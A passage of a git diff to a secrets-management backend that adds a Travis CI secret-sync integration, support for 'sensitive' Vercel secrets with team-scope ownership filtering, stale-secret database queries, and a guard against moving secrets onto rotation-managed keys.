SECRET_SYNC_NAME_MAP } from "../secret-sync-maps"; +import { TTravisCIEnvVar, TTravisCISyncWithCredentials } from "./travis-ci-sync-types"; + +const BASE_DELAY_MS = 100; +const MAX_DELAY_MS = 5000; +const MAX_RETRIES = 5; + +const sleep = (ms: number) => + new Promise((resolve) => { + setTimeout(resolve, ms); + }); + +type Throttle = { + wait: () => Promise; + bumpOn429: () => void; +}; + +const makeThrottle = (): Throttle => { + let currentDelayMs = BASE_DELAY_MS; + return { + wait: () => sleep(currentDelayMs), + bumpOn429: () => { + currentDelayMs = Math.min(currentDelayMs * 2, MAX_DELAY_MS); + } + }; +}; + +const makeRequestWithRetry = async (throttle: Throttle, requestFn: () => Promise, attempt = 0): Promise => { + await throttle.wait(); + try { + return await requestFn(); + } catch (error) { + if (isAxiosError(error) && error.response?.status === 429 && attempt < MAX_RETRIES) { + throttle.bumpOn429(); + return makeRequestWithRetry(throttle, requestFn, attempt + 1); + } + throw error; + } +}; + +const travisCIApiHeaders = (apiToken: string) => ({ + Authorization: `token ${apiToken}`, + "Travis-API-Version": "3", + Accept: "application/json" +}); + +const getRepoEnvVars = async ( + apiToken: string, + repositoryId: string, + throttle: Throttle +): Promise => { + const { data } = await makeRequestWithRetry(throttle, () => + request.get<{ env_vars: TTravisCIEnvVar[] }>( + `${IntegrationUrls.TRAVISCI_API_URL}/repo/${encodeURIComponent(repositoryId)}/env_vars`, + { headers: travisCIApiHeaders(apiToken) } + ) + ); + + return data?.env_vars ?? []; +}; + +const filterByScope = ( + envVars: TTravisCIEnvVar[], + destinationConfig: TTravisCISyncWithCredentials["destinationConfig"] +): TTravisCIEnvVar[] => { + if (destinationConfig.branch) { + return envVars.filter((envVar) => envVar.branch === destinationConfig.branch); + } + + return envVars.filter((envVar) => envVar.branch === null); +}; + +type TTravisCIEnvVarUpsertBody = { + "env_var.name": string; + "env_var.value": string; + "env_var.public": boolean; + "env_var.branch"?: string; +}; + +const upsertRepoEnvVar = async ({ + apiToken, + repositoryId, + existingEnvVarId, + body, + throttle +}: { + apiToken: string; + repositoryId: string; + existingEnvVarId?: string; + body: TTravisCIEnvVarUpsertBody; + throttle: Throttle; +}): Promise => { + const headers = { ...travisCIApiHeaders(apiToken), "Content-Type": "application/json" }; + const encodedRepoId = encodeURIComponent(repositoryId); + + if (existingEnvVarId) { + await makeRequestWithRetry(throttle, () => + request.patch( + `${IntegrationUrls.TRAVISCI_API_URL}/repo/${encodedRepoId}/env_var/${encodeURIComponent(existingEnvVarId)}`, + body, + { headers } + ) + ); + return; + } + + await makeRequestWithRetry(throttle, () => + request.post(`${IntegrationUrls.TRAVISCI_API_URL}/repo/${encodedRepoId}/env_vars`, body, { headers }) + ); +}; + +export const TravisCISyncFns = { + async getSecrets(secretSync: TTravisCISyncWithCredentials): Promise { + throw new Error(`${SECRET_SYNC_NAME_MAP[secretSync.destination]} does not support importing secrets.`); + }, + + async syncSecrets(secretSync: TTravisCISyncWithCredentials, secretMap: TSecretMap): Promise { + const { + connection: { + credentials: { apiToken } + }, + destinationConfig, + environment, + syncOptions: { disableSecretDeletion, keySchema } + } = secretSync; + + const throttle = makeThrottle(); + const envVars = await getRepoEnvVars(apiToken, destinationConfig.repositoryId, throttle); + const scopedEnvVars = filterByScope(envVars, destinationConfig); + const scopedByName = Object.fromEntries(scopedEnvVars.map((envVar) => [envVar.name, envVar])); + + for (const key of Object.keys(secretMap)) { + try { + const entry = secretMap[key]; + const body: TTravisCIEnvVarUpsertBody = { + "env_var.name": key, + "env_var.value": entry.value, + "env_var.public": false + }; + + const { branch } = destinationConfig; + if (typeof branch === "string" && branch.length > 0) { + body["env_var.branch"] = branch; + } + + await upsertRepoEnvVar({ + apiToken, + repositoryId: destinationConfig.repositoryId, + existingEnvVarId: scopedByName[key]?.id, + body, + throttle + }); + } catch (error) { + throw new SecretSyncError({ error, secretKey: key }); + } + } + + if (disableSecretDeletion) return; + + // check if it is possible to delete in bulk + + for (const envVar of scopedEnvVars) { + if (!matchesSchema(envVar.name, environment?.slug || "", keySchema)) continue; + if (envVar.name in secretMap) continue; + + try { + await makeRequestWithRetry(throttle, () => + request.delete( + `${IntegrationUrls.TRAVISCI_API_URL}/repo/${encodeURIComponent( + destinationConfig.repositoryId + )}/env_var/${encodeURIComponent(envVar.id)}`, + { headers: travisCIApiHeaders(apiToken) } + ) + ); + } catch (error) { + if (isAxiosError(error) && error.response?.status === 404) continue; + throw new SecretSyncError({ error, secretKey: envVar.name }); + } + } + }, + + async removeSecrets(secretSync: TTravisCISyncWithCredentials, secretMap: TSecretMap): Promise { + const { + connection: { + credentials: { apiToken } + }, + destinationConfig + } = secretSync; + + const throttle = makeThrottle(); + const envVars = await getRepoEnvVars(apiToken, destinationConfig.repositoryId, throttle); + const scopedEnvVars = filterByScope(envVars, destinationConfig); + + for (const envVar of scopedEnvVars) { + if (!(envVar.name in secretMap)) continue; + + try { + await makeRequestWithRetry(throttle, () => + request.delete( + `${IntegrationUrls.TRAVISCI_API_URL}/repo/${encodeURIComponent( + destinationConfig.repositoryId + )}/env_var/${encodeURIComponent(envVar.id)}`, + { headers: travisCIApiHeaders(apiToken) } + ) + ); + } catch (error) { + if (isAxiosError(error) && error.response?.status === 404) continue; + throw new SecretSyncError({ error, secretKey: envVar.name }); + } + } + } +}; diff --git a/backend/src/services/secret-sync/travis-ci/travis-ci-sync-schemas.ts b/backend/src/services/secret-sync/travis-ci/travis-ci-sync-schemas.ts new file mode 100644 index 00000000000..9354a10bf85 --- /dev/null +++ b/backend/src/services/secret-sync/travis-ci/travis-ci-sync-schemas.ts @@ -0,0 +1,60 @@ +import { z } from "zod"; + +import { SecretSyncs } from "@app/lib/api-docs"; +import { AppConnection } from "@app/services/app-connection/app-connection-enums"; +import { SecretSync } from "@app/services/secret-sync/secret-sync-enums"; +import { + BaseSecretSyncSchema, + GenericCreateSecretSyncFieldsSchema, + GenericUpdateSecretSyncFieldsSchema +} from "@app/services/secret-sync/secret-sync-schemas"; +import { TSyncOptionsConfig } from "@app/services/secret-sync/secret-sync-types"; + +import { SECRET_SYNC_NAME_MAP } from "../secret-sync-maps"; + +const TravisCISyncDestinationConfigSchema = z.object({ + repositoryId: z + .string() + .trim() + .min(1, "Repository ID is required") + .describe(SecretSyncs.DESTINATION_CONFIG.TRAVIS_CI.repositoryId), + repositorySlug: z + .string() + .trim() + .min(1, "Repository slug is required") + .describe(SecretSyncs.DESTINATION_CONFIG.TRAVIS_CI.repositorySlug), + branch: z.string().trim().min(1).optional().describe(SecretSyncs.DESTINATION_CONFIG.TRAVIS_CI.branch) +}); + +const TravisCISyncOptionsConfig: TSyncOptionsConfig = { canImportSecrets: false }; + +export const TravisCISyncSchema = BaseSecretSyncSchema(SecretSync.TravisCI, TravisCISyncOptionsConfig) + .extend({ + destination: z.literal(SecretSync.TravisCI), + destinationConfig: TravisCISyncDestinationConfigSchema + }) + .describe(JSON.stringify({ title: SECRET_SYNC_NAME_MAP[SecretSync.TravisCI] })); + +export const CreateTravisCISyncSchema = GenericCreateSecretSyncFieldsSchema( + SecretSync.TravisCI, + TravisCISyncOptionsConfig +).extend({ + destinationConfig: TravisCISyncDestinationConfigSchema +}); + +export const UpdateTravisCISyncSchema = GenericUpdateSecretSyncFieldsSchema( + SecretSync.TravisCI, + TravisCISyncOptionsConfig +).extend({ + destinationConfig: TravisCISyncDestinationConfigSchema.optional() +}); + +export const TravisCISyncListItemSchema = z + .object({ + name: z.literal("Travis CI"), + connection: z.literal(AppConnection.TravisCI), + destination: z.literal(SecretSync.TravisCI), + canImportSecrets: z.literal(false), + canRemoveSecretsOnDeletion: z.literal(true) + }) + .describe(JSON.stringify({ title: SECRET_SYNC_NAME_MAP[SecretSync.TravisCI] })); diff --git a/backend/src/services/secret-sync/travis-ci/travis-ci-sync-types.ts b/backend/src/services/secret-sync/travis-ci/travis-ci-sync-types.ts new file mode 100644 index 00000000000..1f6d56cc7d3 --- /dev/null +++ b/backend/src/services/secret-sync/travis-ci/travis-ci-sync-types.ts @@ -0,0 +1,23 @@ +import { z } from "zod"; + +import { TTravisCIConnection } from "@app/services/app-connection/travis-ci"; + +import { CreateTravisCISyncSchema, TravisCISyncListItemSchema, TravisCISyncSchema } from "./travis-ci-sync-schemas"; + +export type TTravisCISyncListItem = z.infer; + +export type TTravisCISync = z.infer; + +export type TTravisCISyncInput = z.infer; + +export type TTravisCISyncWithCredentials = TTravisCISync & { + connection: TTravisCIConnection; +}; + +export type TTravisCIEnvVar = { + id: string; + name: string; + value: string | null; + public: boolean; + branch: string | null; +}; diff --git a/backend/src/services/secret-sync/vercel/vercel-sync-fns.ts b/backend/src/services/secret-sync/vercel/vercel-sync-fns.ts index 730270f74d6..c12896f3f2e 100644 --- a/backend/src/services/secret-sync/vercel/vercel-sync-fns.ts +++ b/backend/src/services/secret-sync/vercel/vercel-sync-fns.ts @@ -228,7 +228,7 @@ const createSecret = async ( { key, value: secretMap[key].value, - type: "encrypted", + type: destinationConfig.sensitive ? "sensitive" : "encrypted", target: isVercelDefaultEnvType(destinationConfig.env) ? [destinationConfig.env] : [], customEnvironmentIds: !isVercelDefaultEnvType(destinationConfig.env) ? [destinationConfig.env] : [], ...(destinationConfig.env === VercelEnvironmentType.Preview && destinationConfig.branch @@ -320,6 +320,27 @@ const updateSecret = async ( // ===== Team-scoped shared environment variable functions ===== +type TeamDestinationConfig = Extract; + +const setsEqual = (a: readonly string[] | undefined, b: readonly string[] | undefined) => { + const av = a ?? []; + const bv = b ?? []; + if (av.length !== bv.length) return false; + const bSet = new Set(bv); + return av.every((v) => bSet.has(v)); +}; + +const isTeamSharedEnvVarOwnedByThisSync = (envVar: VercelSharedEnvVar, destinationConfig: TeamDestinationConfig) => { + const expectedType = destinationConfig.sensitive ? "sensitive" : "encrypted"; + if (envVar.type !== expectedType) return false; + + const effectiveTargets = destinationConfig.sensitive + ? destinationConfig.targetEnvironments?.filter((env) => env !== VercelEnvironmentType.Development) + : destinationConfig.targetEnvironments; + + return setsEqual(envVar.target, effectiveTargets) && setsEqual(envVar.projectId, destinationConfig.targetProjects); +}; + const listTeamSharedEnvVarsWithRetries = async ( secretSync: TVercelSyncWithCredentials ): Promise => { @@ -431,6 +452,19 @@ const getTeamSharedEnvVars = async (secretSync: TVercelSyncWithCredentials): Pro return envVarsWithValues; }; +const getOwnedTeamSharedEnvVars = async (secretSync: TVercelSyncWithCredentials): Promise => { + if (secretSync.destinationConfig.scope !== VercelSyncScope.Team) { + throw new SecretSyncError({ + message: "Invalid scope for team-level Vercel secret sync", + shouldRetry: false + }); + } + + const teamDestinationConfig = secretSync.destinationConfig; + const allSharedEnvVars = await getTeamSharedEnvVars(secretSync); + return allSharedEnvVars.filter((envVar) => isTeamSharedEnvVarOwnedByThisSync(envVar, teamDestinationConfig)); +}; + const createTeamSharedEnvVar = async ( secretSync: TVercelSyncWithCredentials, key: string, @@ -451,6 +485,24 @@ const createTeamSharedEnvVar = async ( }); } + // When sensitive is enabled, the Development environment is not supported by Vercel. + const effectiveTargetEnvironments = destinationConfig.targetEnvironments?.filter( + (env) => !destinationConfig.sensitive || env !== VercelEnvironmentType.Development + ); + + if ( + destinationConfig.sensitive && + !destinationConfig.applyToAllCustomEnvironments && + (!effectiveTargetEnvironments || effectiveTargetEnvironments.length === 0) + ) { + throw new SecretSyncError({ + message: + "Marking secrets as sensitive in Vercel is not supported for development environments. Add another target environment or disable Sensitive.", + secretKey: key, + shouldRetry: false + }); + } + try { const { data: createResponse } = await request.post<{ created: VercelSharedEnvVar[]; @@ -459,9 +511,10 @@ const createTeamSharedEnvVar = async ( `${IntegrationUrls.VERCEL_API_URL}/v1/env?teamId=${destinationConfig.teamId}`, { evs: [{ key, value }], - type: "encrypted", - ...(destinationConfig.targetEnvironments?.length ? { target: destinationConfig.targetEnvironments } : {}), - ...(destinationConfig.targetProjects !== undefined ? { projectId: destinationConfig.targetProjects } : {}) + type: destinationConfig.sensitive ? "sensitive" : "encrypted", + ...(effectiveTargetEnvironments?.length ? { target: effectiveTargetEnvironments } : {}), + ...(destinationConfig.targetProjects !== undefined ? { projectId: destinationConfig.targetProjects } : {}), + applyToAllCustomEnvironments: Boolean(destinationConfig.applyToAllCustomEnvironments) }, { headers: { @@ -508,6 +561,26 @@ const updateTeamSharedEnvVar = async ( }); } + const isExistingSensitive = envVar.type === "sensitive"; + + // When sensitive is enabled, the Development environment is not supported by Vercel. + const effectiveTargetEnvironments = destinationConfig.targetEnvironments?.filter( + (env) => !(destinationConfig.sensitive || isExistingSensitive) || env !== VercelEnvironmentType.Development + ); + + if ( + (destinationConfig.sensitive || isExistingSensitive) && + !destinationConfig.applyToAllCustomEnvironments && + (!effectiveTargetEnvironments || effectiveTargetEnvironments.length === 0) + ) { + throw new SecretSyncError({ + message: + "Marking secrets as sensitive in Vercel is not supported for development environments. Add another target environment or disable Sensitive.", + secretKey: envVar.key, + shouldRetry: false + }); + } + try { const { data: updateResponse } = await request.patch<{ updated: VercelSharedEnvVar[]; @@ -518,8 +591,9 @@ const updateTeamSharedEnvVar = async ( updates: { [envVar.id]: { value, - ...(destinationConfig.targetEnvironments?.length ? { target: destinationConfig.targetEnvironments } : {}), - ...(destinationConfig.targetProjects !== undefined ? { projectId: destinationConfig.targetProjects } : {}) + ...(effectiveTargetEnvironments !== undefined ? { target: effectiveTargetEnvironments } : {}), + ...(destinationConfig.targetProjects !== undefined ? { projectId: destinationConfig.targetProjects } : {}), + applyToAllCustomEnvironments: Boolean(destinationConfig.applyToAllCustomEnvironments) } } }, @@ -599,38 +673,69 @@ const deleteTeamSharedEnvVar = async ( export const VercelSyncFns = { syncSecrets: async (secretSync: TVercelSyncWithCredentials, secretMap: TSecretMap) => { if (secretSync.destinationConfig.scope === VercelSyncScope.Team) { - const sharedEnvVars = await getTeamSharedEnvVars(secretSync); - const sharedEnvVarsMap = new Map(sharedEnvVars.map((s) => [s.key, s])); + const allSharedEnvVars = await getTeamSharedEnvVars(secretSync); + const sharedEnvVarsMap = new Map(allSharedEnvVars.map((s) => [s.key, s])); - const { targetEnvironments, targetProjects } = secretSync.destinationConfig; + const { targetEnvironments, targetProjects, sensitive, applyToAllCustomEnvironments } = + secretSync.destinationConfig; for await (const key of Object.keys(secretMap)) { const existingVar = sharedEnvVarsMap.get(key); if (!existingVar) { await createTeamSharedEnvVar(secretSync, key, secretMap[key].value); - } else { - const hasValueChanged = existingVar.value !== secretMap[key].value; + // eslint-disable-next-line no-continue + continue; + } - const hasTargetChanged = targetEnvironments?.length - ? existingVar.target.length !== targetEnvironments.length || - !targetEnvironments.every((env) => existingVar.target.includes(env)) - : false; + // Vercel does not allow changing a secret's `type` between encrypted and sensitive + // via PATCH, so we delete and recreate when the desired sensitivity differs. + const existingIsSensitive = existingVar.type === "sensitive"; + const sensitivityChanged = existingIsSensitive !== Boolean(sensitive); + + if (sensitivityChanged) { + await deleteTeamSharedEnvVar(secretSync, existingVar); + await createTeamSharedEnvVar(secretSync, key, secretMap[key].value); + // eslint-disable-next-line no-continue + continue; + } - const hasProjectsChanged = targetProjects - ? (existingVar.projectId?.length ?? 0) !== targetProjects.length || - !targetProjects.every((pid) => existingVar.projectId?.includes(pid)) + const hasValueChanged = existingVar.value !== secretMap[key].value; + + // Sensitive secrets cannot target Development in Vercel β€” strip before comparing. + const isSensitive = sensitive || existingVar.type === "sensitive"; + const effectiveTargets = targetEnvironments?.filter( + (env) => !isSensitive || env !== VercelEnvironmentType.Development + ); + + const existingTarget = existingVar.target ?? []; + const hasTargetChanged = + effectiveTargets !== undefined + ? existingTarget.length !== effectiveTargets.length || + !effectiveTargets.every((env) => existingTarget.includes(env)) : false; - if (hasValueChanged || hasTargetChanged || hasProjectsChanged) { - await updateTeamSharedEnvVar(secretSync, existingVar, secretMap[key].value); - } + const hasProjectsChanged = targetProjects + ? (existingVar.projectId?.length ?? 0) !== targetProjects.length || + !targetProjects.every((pid) => existingVar.projectId?.includes(pid)) + : false; + + const hasAllCustomChanged = + Boolean(applyToAllCustomEnvironments) !== (existingVar.applyToAllCustomEnvironments ?? false); + + if (hasValueChanged || hasTargetChanged || hasProjectsChanged || hasAllCustomChanged) { + await updateTeamSharedEnvVar(secretSync, existingVar, secretMap[key].value); } } if (secretSync.syncOptions.disableSecretDeletion) return; - for await (const sharedEnvVar of sharedEnvVars) { + const teamDestinationConfig = secretSync.destinationConfig; + const ownedEnvVars = allSharedEnvVars.filter((envVar) => + isTeamSharedEnvVarOwnedByThisSync(envVar, teamDestinationConfig) + ); + + for await (const sharedEnvVar of ownedEnvVars) { if (!matchesSchema(sharedEnvVar.key, secretSync.environment?.slug || "", secretSync.syncOptions.keySchema)) // eslint-disable-next-line no-continue continue; @@ -652,6 +757,18 @@ export const VercelSyncFns = { if (!existingSecret) { await createSecret(secretSync, secretMap, key); + // eslint-disable-next-line no-continue + continue; + } + + // Vercel does not allow changing a secret's `type` between encrypted and sensitive + // via PATCH, so we delete and recreate when the desired sensitivity differs. + const existingIsSensitive = existingSecret.type === "sensitive"; + const sensitivityChanged = existingIsSensitive !== Boolean(secretSync.destinationConfig.sensitive); + + if (sensitivityChanged) { + await deleteSecret(secretSync, existingSecret); + await createSecret(secretSync, secretMap, key); } else if (existingSecret.value !== secretMap[key].value) { await updateSecret(secretSync, secretMap, existingSecret); } @@ -673,7 +790,7 @@ export const VercelSyncFns = { getSecrets: async (secretSync: TVercelSyncWithCredentials): Promise => { if (secretSync.destinationConfig.scope === VercelSyncScope.Team) { - const sharedEnvVars = await getTeamSharedEnvVars(secretSync); + const sharedEnvVars = await getOwnedTeamSharedEnvVars(secretSync); return Object.fromEntries(sharedEnvVars.map((s) => [s.key, { value: s.value ?? "" }])); } @@ -683,7 +800,7 @@ export const VercelSyncFns = { removeSecrets: async (secretSync: TVercelSyncWithCredentials, secretMap: TSecretMap) => { if (secretSync.destinationConfig.scope === VercelSyncScope.Team) { - const sharedEnvVars = await getTeamSharedEnvVars(secretSync); + const sharedEnvVars = await getOwnedTeamSharedEnvVars(secretSync); for await (const sharedEnvVar of sharedEnvVars) { if (sharedEnvVar.key in secretMap) { diff --git a/backend/src/services/secret-sync/vercel/vercel-sync-schemas.ts b/backend/src/services/secret-sync/vercel/vercel-sync-schemas.ts index 36f60f463c9..930f56a82fd 100644 --- a/backend/src/services/secret-sync/vercel/vercel-sync-schemas.ts +++ b/backend/src/services/secret-sync/vercel/vercel-sync-schemas.ts @@ -13,26 +13,56 @@ import { TSyncOptionsConfig } from "@app/services/secret-sync/secret-sync-types" import { SECRET_SYNC_NAME_MAP } from "../secret-sync-maps"; import { VercelEnvironmentType, VercelSyncScope } from "./vercel-sync-enums"; -const VercelSyncDestinationConfigSchema = z.discriminatedUnion("scope", [ - z.object({ - scope: z.literal(VercelSyncScope.Project), - app: z.string().min(1, "App ID is required").describe(SecretSyncs.DESTINATION_CONFIG.VERCEL.app), - appName: z.string().min(1, "App Name is required").describe(SecretSyncs.DESTINATION_CONFIG.VERCEL.appName), - env: z.nativeEnum(VercelEnvironmentType).or(z.string()).describe(SecretSyncs.DESTINATION_CONFIG.VERCEL.env), - branch: z.string().optional().describe(SecretSyncs.DESTINATION_CONFIG.VERCEL.branch), - teamId: z.string().describe(SecretSyncs.DESTINATION_CONFIG.VERCEL.teamId) - }), - z.object({ - scope: z.literal(VercelSyncScope.Team), - teamId: z.string().min(1, "Team ID is required").describe(SecretSyncs.DESTINATION_CONFIG.VERCEL.teamId), - teamName: z.string().optional().describe(SecretSyncs.DESTINATION_CONFIG.VERCEL.teamName), - targetEnvironments: z - .array(z.nativeEnum(VercelEnvironmentType)) - .min(1, "At least one environment is required") - .describe(SecretSyncs.DESTINATION_CONFIG.VERCEL.targetEnvironments), - targetProjects: z.array(z.string()).optional().describe(SecretSyncs.DESTINATION_CONFIG.VERCEL.targetProjects) - }) -]); +const VercelSyncDestinationConfigSchema = z + .discriminatedUnion("scope", [ + z.object({ + scope: z.literal(VercelSyncScope.Project), + app: z.string().min(1, "App ID is required").describe(SecretSyncs.DESTINATION_CONFIG.VERCEL.app), + appName: z.string().min(1, "App Name is required").describe(SecretSyncs.DESTINATION_CONFIG.VERCEL.appName), + env: z.nativeEnum(VercelEnvironmentType).or(z.string()).describe(SecretSyncs.DESTINATION_CONFIG.VERCEL.env), + branch: z.string().optional().describe(SecretSyncs.DESTINATION_CONFIG.VERCEL.branch), + teamId: z.string().describe(SecretSyncs.DESTINATION_CONFIG.VERCEL.teamId), + sensitive: z.boolean().default(false).describe(SecretSyncs.DESTINATION_CONFIG.VERCEL.sensitive) + }), + z.object({ + scope: z.literal(VercelSyncScope.Team), + teamId: z.string().min(1, "Team ID is required").describe(SecretSyncs.DESTINATION_CONFIG.VERCEL.teamId), + teamName: z.string().optional().describe(SecretSyncs.DESTINATION_CONFIG.VERCEL.teamName), + targetEnvironments: z + .array(z.nativeEnum(VercelEnvironmentType)) + .optional() + .default([]) + .describe(SecretSyncs.DESTINATION_CONFIG.VERCEL.targetEnvironments), + applyToAllCustomEnvironments: z + .boolean() + .optional() + .default(false) + .describe(SecretSyncs.DESTINATION_CONFIG.VERCEL.applyToAllCustomEnvironments), + targetProjects: z.array(z.string()).optional().describe(SecretSyncs.DESTINATION_CONFIG.VERCEL.targetProjects), + sensitive: z.boolean().default(false).describe(SecretSyncs.DESTINATION_CONFIG.VERCEL.sensitive) + }) + ]) + .superRefine((config, ctx) => { + if (config.scope === VercelSyncScope.Team) { + if (!config.targetEnvironments?.length && !config.applyToAllCustomEnvironments) { + ctx.addIssue({ + code: z.ZodIssueCode.custom, + message: "At least one target environment or applyToAllCustomEnvironments must be set.", + path: ["targetEnvironments"] + }); + } + } + + if (!config.sensitive) return; + + if (config.scope === VercelSyncScope.Project && config.env === VercelEnvironmentType.Development) { + ctx.addIssue({ + code: z.ZodIssueCode.custom, + message: "Marking secrets as sensitive in Vercel is not supported for development environments.", + path: ["sensitive"] + }); + } + }); const VercelSyncOptionsConfig: TSyncOptionsConfig = { canImportSecrets: true }; diff --git a/backend/src/services/secret-sync/vercel/vercel-sync-types.ts b/backend/src/services/secret-sync/vercel/vercel-sync-types.ts index 6d29e517ece..aef68f5dfdd 100644 --- a/backend/src/services/secret-sync/vercel/vercel-sync-types.ts +++ b/backend/src/services/secret-sync/vercel/vercel-sync-types.ts @@ -44,8 +44,9 @@ export interface VercelSharedEnvVar { key: string; value: string; type: string; - target: string[]; + target?: string[]; projectId?: string[]; + applyToAllCustomEnvironments?: boolean; decrypted?: boolean; comment?: string; createdAt?: number; diff --git a/backend/src/services/secret-v2-bridge/secret-v2-bridge-dal.ts b/backend/src/services/secret-v2-bridge/secret-v2-bridge-dal.ts index 13295398038..c01fc9178c0 100644 --- a/backend/src/services/secret-v2-bridge/secret-v2-bridge-dal.ts +++ b/backend/src/services/secret-v2-bridge/secret-v2-bridge-dal.ts @@ -1128,6 +1128,52 @@ export const secretV2BridgeDALFactory = ({ db, keyStore }: TSecretV2DalArg) => { } }; + const findStaleByProject = async ( + projectId: string, + staleBeforeDate: Date, + pagination?: { offset: number; limit: number }, + tx?: Knex + ) => { + try { + const result = await (tx || db.replicaNode())(TableName.SecretV2) + .join(TableName.SecretFolder, `${TableName.SecretV2}.folderId`, `${TableName.SecretFolder}.id`) + .join(TableName.Environment, `${TableName.SecretFolder}.envId`, `${TableName.Environment}.id`) + .where(`${TableName.Environment}.projectId`, projectId) + .whereNull(`${TableName.SecretV2}.userId`) + .where(`${TableName.SecretV2}.updatedAt`, "<", staleBeforeDate) + .select( + `${TableName.SecretV2}.key`, + `${TableName.SecretV2}.updatedAt`, + `${TableName.SecretV2}.folderId`, + `${TableName.Environment}.slug as environment` + ) + .orderBy(`${TableName.SecretV2}.updatedAt`, "asc") + .offset(pagination?.offset ?? 0) + .limit(pagination?.limit ?? 50); + + return result as { key: string; updatedAt: Date; folderId: string; environment: string }[]; + } catch (error) { + throw new DatabaseError({ error, name: "findStaleByProject" }); + } + }; + + const countStaleByProject = async (projectId: string, staleBeforeDate: Date, tx?: Knex) => { + try { + const result = await (tx || db.replicaNode())(TableName.SecretV2) + .join(TableName.SecretFolder, `${TableName.SecretV2}.folderId`, `${TableName.SecretFolder}.id`) + .join(TableName.Environment, `${TableName.SecretFolder}.envId`, `${TableName.Environment}.id`) + .where(`${TableName.Environment}.projectId`, projectId) + .whereNull(`${TableName.SecretV2}.userId`) + .where(`${TableName.SecretV2}.updatedAt`, "<", staleBeforeDate) + .count("* as count") + .first(); + + return Number((result as { count?: string | number })?.count ?? 0); + } catch (error) { + throw new DatabaseError({ error, name: "countStaleByProject" }); + } + }; + return { ...secretOrm, update, @@ -1144,6 +1190,8 @@ export const secretV2BridgeDALFactory = ({ db, keyStore }: TSecretV2DalArg) => { findReferencedSecretReferences, findAllProjectSecretValues, countByFolderIds, + findStaleByProject, + countStaleByProject, findOne, find, invalidateSecretCacheByProjectId, diff --git a/backend/src/services/secret-v2-bridge/secret-v2-bridge-fns.ts b/backend/src/services/secret-v2-bridge/secret-v2-bridge-fns.ts index 646609b3e9c..5ee6b332d03 100644 --- a/backend/src/services/secret-v2-bridge/secret-v2-bridge-fns.ts +++ b/backend/src/services/secret-v2-bridge/secret-v2-bridge-fns.ts @@ -271,6 +271,7 @@ export const fnSecretBulkUpdate = async ({ const secsUpdatedTag = inputSecrets.flatMap(({ data: { tags } }, i) => tags !== undefined ? { tags, secretId: newSecrets[i].id } : [] ); + if (secsUpdatedTag.length) { await secretTagDAL.deleteTagsToSecretV2( { $in: { secrets_v2Id: secsUpdatedTag.map(({ secretId }) => secretId) } }, diff --git a/backend/src/services/secret-v2-bridge/secret-v2-bridge-service.ts b/backend/src/services/secret-v2-bridge/secret-v2-bridge-service.ts index 4df76875940..4efe00646d7 100644 --- a/backend/src/services/secret-v2-bridge/secret-v2-bridge-service.ts +++ b/backend/src/services/secret-v2-bridge/secret-v2-bridge-service.ts @@ -33,7 +33,7 @@ import { } from "@app/ee/services/secret-approval-request/secret-approval-request-types"; import { scanSecretPolicyViolations } from "@app/ee/services/secret-scanning-v2/secret-scanning-v2-fns"; import { TSecretSnapshotServiceFactory } from "@app/ee/services/secret-snapshot/secret-snapshot-service"; -import { KeyStorePrefixes, TKeyStoreFactory } from "@app/keystore/keystore"; +import { KeyStorePrefixes, KeyStoreTtls, TKeyStoreFactory } from "@app/keystore/keystore"; import { generateCacheKeyFromData } from "@app/lib/crypto/cache"; import { DatabaseErrorCode } from "@app/lib/error-codes"; import { BadRequestError, ForbiddenRequestError, NotFoundError } from "@app/lib/errors"; @@ -147,8 +147,6 @@ type TSecretV2BridgeServiceFactoryDep = { secretValidationRuleService: Pick; }; -const ETAG_TTL = 900; // 15 minutes in seconds - export type TSecretV2BridgeServiceFactory = ReturnType; /* @@ -631,7 +629,7 @@ export const secretV2BridgeServiceFactory = ({ environment, envId: folder.envId, secretPath, - secrets: [{ key: finalKey, value: secretValue }] + secrets: [{ key: finalKey, value: secretValue, secretId }] }); } @@ -1247,7 +1245,7 @@ export const secretV2BridgeServiceFactory = ({ }; const cachedEtag = `"${generateCacheKeyFromData(payload)}"`; await keyStore.hashSet(etagRedisKey, etagField, cachedEtag); - await keyStore.setExpiry(etagRedisKey, ETAG_TTL); + await keyStore.setExpiry(etagRedisKey, KeyStoreTtls.SecretEtagInSeconds); return { ...payload, etag: cachedEtag }; } catch (err) { logger.error(err, "Secret service layer cache miss"); @@ -1498,7 +1496,7 @@ export const secretV2BridgeServiceFactory = ({ } const computedEtag = `"${generateCacheKeyFromData(payload)}"`; await keyStore.hashSet(etagRedisKey, etagField, computedEtag); - await keyStore.setExpiry(etagRedisKey, ETAG_TTL); + await keyStore.setExpiry(etagRedisKey, KeyStoreTtls.SecretEtagInSeconds); return { ...payload, etag: computedEtag }; } @@ -1572,7 +1570,7 @@ export const secretV2BridgeServiceFactory = ({ } const computedEtag = `"${generateCacheKeyFromData(payload)}"`; await keyStore.hashSet(etagRedisKey, etagField, computedEtag); - await keyStore.setExpiry(etagRedisKey, ETAG_TTL); + await keyStore.setExpiry(etagRedisKey, KeyStoreTtls.SecretEtagInSeconds); return { ...payload, etag: computedEtag }; }; @@ -2337,7 +2335,11 @@ export const secretV2BridgeServiceFactory = ({ const secretsToValidate = [ ...secretsToUpdate .filter((el) => el.secretValue || el.newSecretName) - .map((el) => ({ key: el.newSecretName || el.secretKey, value: el.secretValue })), + .map((el) => ({ + key: el.newSecretName || el.secretKey, + value: el.secretValue, + secretId: secretsToUpdateInDBGroupedByKey[el.secretKey]?.[0]?.id + })), ...(updateMode === SecretUpdateMode.Upsert ? secretsToCreate.map((el) => ({ key: el.secretKey, value: el.secretValue })) : []) @@ -2981,6 +2983,17 @@ export const secretV2BridgeServiceFactory = ({ const destinationSecretsGroupedByKey = groupBy(decryptedDestinationSecrets, (i) => i.key); + const sourceKeys = decryptedSourceSecrets.map((s) => s.key); + + const conflictingRotationSecretKeys = sourceKeys.filter( + (key) => destinationSecretsGroupedByKey[key]?.[0]?.isRotatedSecret + ); + if (conflictingRotationSecretKeys.length > 0) { + throw new BadRequestError({ + message: `Cannot move secrets to '${destinationFolder.path}' because the following keys are managed by a secret rotation at the destination: ${conflictingRotationSecretKeys.join(", ")}` + }); + } + const locallyCreatedSecrets = decryptedSourceSecrets .filter(({ key }) => !destinationSecretsGroupedByKey[key]?.[0]) .map((el) => ({ ...el, operation: SecretOperations.Create })); diff --git a/backend/src/services/secret-validation-rule/secret-validation-rule-fns.ts b/backend/src/services/secret-validation-rule/secret-validation-rule-fns.ts index 303a720f426..82299190ec0 100644 --- a/backend/src/services/secret-validation-rule/secret-validation-rule-fns.ts +++ 